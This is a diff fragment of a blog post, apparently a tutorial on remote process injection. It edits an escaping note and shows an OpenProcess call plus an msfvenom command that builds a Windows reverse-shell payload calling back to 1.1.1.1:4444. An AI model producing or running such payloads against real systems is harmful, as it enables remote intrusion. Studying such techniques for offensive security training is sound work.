timsonner/sveltekit-markdown-blog/blog/src/routes/blog/go-remote-dll-process-injection.md

 processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(argv[1]));
 ```

-**You should also probably change teh payload, cuz ya know random shellcod3z from teh internetz, plus Mdsvex just doesn't parse this correctly on the blog and I'm in no hurry to figure out why...
+**You should also probably change teh payload, cuz ya know random shellcod3z from teh internetz, plus Mdsvex just doesn't parse this correctly on the blog (watch for missing '\' in any command line commands) and I'm in no hurry to figure out why...
 We as humans typically don't change until we have to...**

 ```
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f c -b "\x00"
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f c -b "\\x00"
 ```

 ![](/go-remote-dll-process-injection/example-1-shellcode.png)